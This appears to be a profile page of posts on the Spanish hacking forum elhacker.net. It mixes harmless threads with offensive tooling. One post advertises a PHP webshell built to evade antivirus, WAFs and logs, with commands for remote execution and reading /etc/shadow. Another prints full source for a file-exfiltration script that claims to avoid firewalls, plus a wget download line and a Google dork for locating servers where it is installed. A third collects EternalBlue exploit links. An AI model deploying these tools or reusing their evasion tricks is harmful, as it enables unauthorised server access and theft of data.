elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Temas
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ... 42
21  Seguridad Informática / Hacking / Mi WebShell en: 11 Febrero 2018, 02:40 am
WHK hShell

Hola, les comparto mi WebShell hecha en php: https://github.com/WHK102/hShell

La había hecho hace muchos años pero comenzaré a publicar algunos de mis proyectos.

Algunas ventajas

  • El núcleo de todo el código está en el cliente y no en el servidor.
  • No deja rastros de la ejecución en el servidor ya que el código no se guarda.
  • No necesita actualizaciones del lado del servidor o intervenir el código en cada cambio.
  • El código es transportado y no almacenado previniendo la detección de los antivirus.
  • El transporte del código está ofuscado evadiendo la detección de los WAF.
  • El transporte de datos se realiza vía HTTP / POST previniendo dejar rastros en los logs de accesos del servidor WEB.
  • Utilización de payloads al azar en el transporte del código para la prevención de la detección de los WAF.
  • Soporta grandes transferencias de datos utilizando el transporte multipart/form-data sin almacenamiento del buffer en memoria por más de 1024 bytes del lado del cliente y del servidor.


¿Cómo se usa?

Igual que cualquier Shell WEB, subes el servidor.php al servidor y luego te conectas utilizando cliente.php desde el terminal así:
Código:
php cliente.php


Comandos disponibles

Código:
hShell:/> help
      Command             | Description
     ──────────────────────────────────────────────────────────────
      connect [url]       : Connect to Server WebShell script.
      help                : Show help of the client.
      cat                 : Show the content of remote file.
      tail [file path]    : Read the last lines of specific file.
      cd [directory]      : Navigate to specific remote directory.
      shell [command]     : Execute a simple command in remote server using the           current remote path. Detect automatic available method on the server. See the call-exec command. Alias of exec and system commands.
      force-shell [method] [command] : Force execute a simple command in remote server using an specific php method in current path. Alias of force-exec and force-system commands. Available methods: system, exec, shell_exec, passthru, popen, proc_open, explicit (using double quotes `).
      edit [editor command] [file path] : Edit remote file with specific local command edtor, example: edit vi /etc/shadow
      nano [file path]    : Edit remote file with nano editor on the local system.
      vi [file path]      : Edit remote file with vi editor on the local system.
      vim [file path]     : Edit remote file with vim editor on the local system.
      gedit [file path]   : Edit remote file with gedit editor on the local system.
      notepad [file path] : Edit remote file with notepad editor on the local system.
      sublime [file path] : Edit remote file with sublime text editor on the local system.
      uninstall           : Uninstall the current WebShell on the server.
      install [file path] : Install the WebShell on the specific remote parh.
      mysql [host] [port] [user] [password] : Start an interative MySQL shell connection on the remote server.
      mysqldump [host] [port] [user] [password] [local file] : Make a dump from remote database to local file .sql
      download [remote path] [local path] : Download a backup of file or directory from server to local path.
      upload [local path] [remote path] : Upload a local file or directory to remote directory (maintains the same permits)
      rm [path]           : Delete the specific file or directory path.
      mkdir [path]        : Make a directory on the server.
      phpinfo             : Show the full info of the php, libraries and enviroments of the server.
      id                  : Show the full info of the current user and group on the server.
      ls                  : List files and folders of the current path on the server. Alias of ll and dir commands.
      shellpath           : Show the current local path of the WebShell server.
      pwd                 : Show the current local path on the server.
      uname               : Show the full info of the System Operative of the server.
      exit                : Exit of the client but not remove the WebShell on the server. See uninstall.  Alias of quit command.

Algunos comandos no están disponibles porque están en construcción continua.

Saludos.
22  Foros Generales / Foro Libre / [ENCONTRADO] Necesito ayuda, como se llama el tema de musica? en: 8 Noviembre 2017, 15:35 pm
Hola, muy buenas tardes, hace dias que ando buscando un tema de música bastante bueno, no recuerdo de que año era pero por el ritmo creo que era de los años 90.

El tema comienza con un hombre britando y el todo el video aparece gente con ropa antigua y bebiendo cervezas, busque por internet y el estilo se llama "german beer music", pero busqué por ese nombre y similares en youtube y hay muchos videos que visualmente son muy parecidos o casi identicos pero la musica no.

Entremedio del tema aparece un dj haciendo scratch y un enano :-/ , ahh y aparece el sonido de un serrucho cortando madera xD

Alguien sabe como se llamaba ese tema?
23  Sistemas Operativos / GNU/Linux / Cómo puedo crear una imagen de disco cifrado en debian o ubuntu? en: 25 Mayo 2017, 18:50 pm
Hola, tengo algunos equipos con debian y otros en ubuntu, me gustaría crear un archivo de imagen de disco pero cifrado, cosa que cuando necesite acceder a el montando la imagen necesite poner una contraseña para cifrar su contenido, de esta manera puedo tener un storage local seguro sin mayores complicaciones utilizando el mismo sistema de archivos que el sistema operativo, también podré llevar este storage cifrado a acualquier lugar desde una memoria sd, disco, cd, etc. No quiero usar fat o ntfs, quiero hacerlo en ext4 o algun sistema de archivos que me puedan recomendar para hacer esto, la idea es mantener las propiedades de los archivos, permisos, enlaces simbolicos, ejecución, etc.

Alguien me podría dar luces sobre como hacer esto desde cero?, luego de crear el disco puedo redimencionarlo para aumentar su capacidad?, hay alguna alternativa mejor que me permita mantener segura la información de os equipos sin tener que usar el engorroso sistema de cifrados nativo de arranque?

Cuando vea bien como hacer esto voy a hacer un script automatizado que le pida la contraseña al usuario y monte su disco descifrado automaticamente y que quede asi hasta que lo explulse o apague el pc o laptop.

Saludos.
24  Seguridad Informática / Análisis y Diseño de Malware / Enlaces y documentación sobre EternalBlue (Ataque Telefonica, Ransomware 2017) en: 13 Mayo 2017, 03:24 am
Este es un post a modo de recopilatorio donde podemos encontrar todo tipo de información sobre el malware para su analisis.

¿Donde nace este ransomware?, Leak de 0days de la NSA es utilizado para crear la propagación de este ransomware
https://actualidad.rt.com/actualidad/238324-snowden-responsable-nsa-ataque-cibernetico

Contexto, sistemas afectados, estadisticas de infección y más
https://hackmd.io/s/H1HYNvmxW

Algunos afectados
http://foro.elhacker.net/noticias/ciberataque_contra_la_intranet_de_telefonica-t469301.0.html;msg2122786#msg2122786

Boletín de Microsoft con el parche de los agujeros
https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Prueba de concepto en python para la vulnerabilidad de ejecucion remota en Windows 10 y Windows Server 2016 para SMB
https://pastebin.com/raw/m4AP8YfS
https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
https://github.com/RiskSense-Ops/MS17-010

Configurando el "Metasploit NSA" para correr EternalBlue + DoublePulsar
http://comunidad.dragonjar.info/discussion/9562/configurando-el-metasploit-nsa-para-correr-eternalblue-doublepulsar
http://www.semecayounexploit.com/?sec=bugs-y-exploits&nota=32


Hasta ahora aun se sigue propagando por una multitud de equipos y compañias debido a que se propaga utilizando por lo menos 6 0days diferentes para windows.

Si tienes mas info puedes postearlo en este lugar
25  Foros Generales / Foro Libre / Inician las votaciones para el evento de Abril Negro de Elhacker.NET !! en: 6 Mayo 2017, 15:19 pm
Hola! ya comenzaron las votaciones! , si quieres venir, el enlace es este: http://foro.elhacker.net/abril_negro/vota_por_el_ganador_del_evento_abril_negro_2017-t469029.0.html

Las bases y proyectos se encuentran dentro del mismo post.
26  Seguridad Informática / Abril negro / Vota por el ganador del evento Abril Negro 2017 en: 6 Mayo 2017, 15:17 pm
Bienvenidos a las votaciones del mejor proyecto para Abril Negro 1017 de Elhacker.NET !!!

Recuerden, solo pueden votar por un proyecto, los enlaces de cada uno se listan a continuación:


Recuerden, cuando hagan sus votaciones intenten no hacerlo solo porque fue un amigo del amigo del amigo, consideren la originalidad, complejidad, usabilidad, tipo de presentación, etc. Si piensas que un proyecto es el mas kool, merece ser ganador de Abril Negro y quieres tener una voz que te escuche, entonces vota por el.

Las votaciones terminan el día 31 de Mayo del 2017, asi que si tienes muchos amigos o una buena botnet, es tu momento de comenzar a votar yaaa!
27  Foros Generales / Foro Libre / Te gusta el hacking? falta poco para que termine el evento Abril Negro! en: 28 Abril 2017, 01:24 am
Hola a todos! ya falta poco para que finalice el evento de Abril Negro 2017!

Recuerden que el último día que se aceptarán participantes es este domingo 30. Vamos que aun quedan varios días. A partir del 1 de Abril comenzarán las votaciones para elegir al ganador del evento.

 ;-)

URL del evento: http://foro.elhacker.net/abril_negro/abril_negro_2017-t464563.0.html
28  Foros Generales / Foro Libre / Comienza Abril Negro 2017 ! en: 7 Abril 2017, 17:17 pm
Hola usuarios! comenzó Abril Negro!, un evento donde puedes demostrar ser el mejor, este mes en este subforo no hay censura! (siempre y cuando lo que se postee tenga relación con abril negro).

Los esperamos a todos:

http://foro.elhacker.net/abril_negro/abril_negro_2017-t464563.0.html

29  Seguridad Informática / Abril negro / w.filebackup (respaldador de archivos remoto automatizado) en: 5 Abril 2017, 23:56 pm
w.filebackup

Hola, hace unos 3 o 4 años atrás hice un script en php, lo que hace es disponerse para hacer un respaldo de todos los archivos del servidor sin tener las limitaciones de tamaño.


¿Cómo funciona?

* No comprime para descargar un solo comprimido, esto previene el uso de disco cuando hay poco espacio.
* Descargar archivo por archivo de manera recursiva, esto previene problemas de termino de ejecución por tiempo fuera cuando el archivo es muy grande.
* Utiliza streaming byte por byte, esto previene el uso desmedido de memoria ram cuando necesitas descargar archivos muy grandes.
* No es detectado por la mayoría de los Firewalls o WAF, gracias a que utiliza enlaces permanentes de apache, así previene el envío de parámetros.


¿Cómo lo ejecuto?

Primeramente, subes el script a un servidor web, por ejemplo http://example.com/w.filebackup.php , ahora cuando veas el script desde el navegador se verá igual que la navegación de archivos de apache, con la diferencia de que no interpretará nada, solo descargará. Ahora, basta con realizar una descarga recursiva con wget y tendrás la descarga de todo el servidor:

Código:
wget -r -x -nH -np --cut-dirs=1 --no-check-certificate --post-data 'token=1' -e robots=off -U 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02011-10-16' http://example.com/w.filebackup.php

Enjoy y Feliz Abril Negro!

Código
  1. <?php
  2. /* w.filebackup.php V1.0 for Administrators by WHK
  3.  *
  4.  * Email: whk@elhacker.net
  5.  * Website: http://whk.elhacker.net/
  6.  *
  7.  * Uso Bash:
  8.  * --------
  9.  * mkdir page && cd page
  10.  * wget -r -x -nH -np --cut-dirs=1 --no-check-certificate --post-data 'token=1' -e robots=off -U 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02011-10-16' http://example.com/w.filebackup.php
  11.  * rm -rf w.filebackup.php*
  12.  *
  13.  * Uso WEB:
  14.  * --------
  15.  * http://web.page/w.filebackup.php
  16.  *
  17.  * Al enviar la variable "token" via HTTP/POST restringe la visualización
  18.  * de los directorios hasta la ruta actual del script, esto evita que el
  19.  * respaldo salga fuera del directorio planeado y cause una sobrecarga.
  20.  * Solo utilizar sin esta variable en caso de querer hacer una backup
  21.  * extrema con mucho tiempo libre.
  22.  *
  23.  * GoogleDork:
  24.  * ----------
  25.  * inurl:".php?do=/" + intitle:"index of"
  26.  *
  27.  * Legal:
  28.  * -----
  29.  * Uso esclusivo sobre servidores propios, nunca utilizar en servidores sin el consentimiento del administrador.
  30.  * El usuario es totalmente responsable de su utilización.
  31.  * En caso de no aceptar este acuerdo no debe ser utilizado.
  32.  *
  33.  * Compatible:
  34.  * ----------
  35.  * Este Script es compatible con servidores con safe mode en ON, servidores sin
  36.  * zlib, sin gz, servidores que no tienen acceso a la shell del sistema, servdiores
  37.  * con mod evasive y mod security, servdiores con firewalls y Antivirus antiShells.
  38.  * No se asegura su funcionalidad al 100% debido a posibles reglas de protección que
  39.  * impidan su normal funcionamiento.
  40.  */
  41. if($getPath = substr($_SERVER['PHP_SELF'], strlen($_SERVER['SCRIPT_NAME']))){
  42.  
  43. /* Procesa el archivo */
  44. if(is_file($getPath)){
  45.  
  46. /* Obtiene el tipo MIME */
  47. if(function_exists('mime_content_type')) {
  48. $mime = mime_content_type($getPath);
  49. }elseif(function_exists('finfo_file')){
  50. $info = finfo_open(FILEINFO_MIME);
  51. $mime = finfo_file($info, $getPath);
  52. finfo_close($info);
  53. }
  54. if(!$type)
  55. $mime = 'application/force-download';
  56. /* Establece las cabeceras */
  57. header('Content-Type: '.$mime);
  58. header('Content-Disposition: attachment; filename='.basename($getPath));
  59. header('Content-Transfer-Encoding: binary');
  60. header('Content-Length: '.filesize($getPath));
  61. /* Hacia el infinito y mas allá! */
  62. if(!@ini_get('safe_mode'))
  63. /* readfile($getPath); que sucede cuando el archivo es mas grande que
  64. * la capacidad de memoria ram asignada en php.ini como un iso, un gz
  65. * con una backup de cpanel o un video? */
  66. if($handle = fopen($getPath, 'r')){
  67.  
  68. /* utiliza bloques de 4kb en modo binario para no corromper el
  69. * contenido a descargar y evitar el uso desmedido de la memoria ram
  70. * y evitar el activado de alarmas de IDS y Firewalls */
  71. while(($buffer = fgets($handle, 4096)) !== false)
  72. echo $buffer;
  73. fclose($handle);
  74. }
  75. /* Procesa el directorio */
  76. }elseif(is_dir($getPath)){
  77. $absolutePath = $getPath;
  78. /* Si no es archivo ni directorio que es? */
  79. }else /* 404 */
  80. $err = 'File not found or access denied ( '.$getPath.' ).';
  81. }
  82. /* Utiliza variables que no sean tan fáciles de incluir en un
  83.  * mod security o alguna regla del firewall (do es utilizado
  84.  * por vbulletin). */
  85. if(isset($_GET['do']) and (is_dir($_GET['do'])))
  86. $absolutePath = $_GET['do'];
  87. if((!isset($absolutePath)) or (!$absolutePath))
  88. $absolutePath = dirname(__file__).'/';
  89. /* Restringe la URL si se solicita */
  90. if(isset($_POST['token']) and (strlen($absolutePath) < strlen(dirname(__file__).'/')))
  91. $absolutePath = dirname(__file__).'/';
  92. $items = array(
  93. 'glob' => array(),
  94. 'folders' => array(),
  95. 'files' => array()
  96. );
  97. // if($items['glob'] = glob($absolutePath.'*')){ glob() no encuentra los archivos ocultos como .htaccess
  98. if($items['glob'] = scandir($absolutePath)){
  99. foreach($items['glob'] as $item){
  100. if(!in_array($item, array('.','..'))){
  101. if(is_dir($absolutePath.$item))
  102. $items['folders'][] = $absolutePath.$item.'/';
  103. else
  104. $items['files'][] = $absolutePath.$item;
  105. }
  106. unset($item);
  107. }
  108. }
  109. unset($items['glob']);
  110. ?>
  111. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  112. <html>
  113. <head>
  114. <title>Index of <?php echo htmlspecialchars($absolutePath, ENT_QUOTES); ?></title>
  115. </head>
  116. <body>
  117. <h1>Index of <?php echo htmlspecialchars($absolutePath, ENT_QUOTES); ?></h1>
  118. <?php if(isset($err)){ ?>
  119. <p><b><i><?php echo htmlspecialchars($err, ENT_QUOTES); ?></i></b></p>
  120. <?php } ?>
  121.  
  122. <ul>
  123. <?php if(!isset($_POST['token'])){ ?>
  124. <li>
  125. <a href="<?php echo $_SERVER['SCRIPT_NAME'].dirname(substr($absolutePath, 0, -1)); ?>/"> Parent Directory</a>
  126. </li>
  127. <?php } ?>
  128.  
  129. <?php if($items['files']){ ?>
  130. <?php foreach($items['files'] as $file){ ?>
  131. <li>
  132. <a href="<?php echo $_SERVER['SCRIPT_NAME'].$file; ?>"> <?php echo htmlspecialchars(basename($file), ENT_QUOTES); ?></a>
  133. </li>
  134. <?php } ?>
  135. <?php } ?>
  136.  
  137. <?php if($items['folders']){ ?>
  138. <?php foreach($items['folders'] as $folder){ ?>
  139. <li>
  140. <a href="<?php echo $_SERVER['SCRIPT_NAME'].'?do='.urlencode($folder); ?>"><?php echo htmlspecialchars(basename($folder), ENT_QUOTES); ?>/</a>
  141. </li>
  142. <?php } ?>
  143. <?php } ?>
  144.  
  145. </ul>
  146.  
  147. <address>
  148. <?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE'], ENT_QUOTES); ?> Server
  149. at <?php echo htmlspecialchars($_SERVER['HTTP_HOST'], ENT_QUOTES); ?>
  150. Port <?php echo (int)$_SERVER['SERVER_PORT']; ?>
  151. </address>
  152. </body>
  153. </html>
  154.  
  155. <?php
  156. /* Evita la ejecución arbitraria por un LFI o <preppendfile> */
  157.  

Mirror: https://github.com/WHK102/w.filebackup/blob/master/w.filebackup.php
30  Seguridad Informática / Abril negro / Comienza Abril Negro 2017 ! en: 1 Abril 2017, 18:09 pm
Hey!, hoy comienza el evento de Abril Negro del año 2017! recuerden, para poder participar solo debes crear un post y publicarlo en el hilo oficial del evento:

http://foro.elhacker.net/abril_negro/abril_negro_2017-t464563.0.html

No solo puedes postear códigos sino también documentación propia.

Saludos!

Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ... 42
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines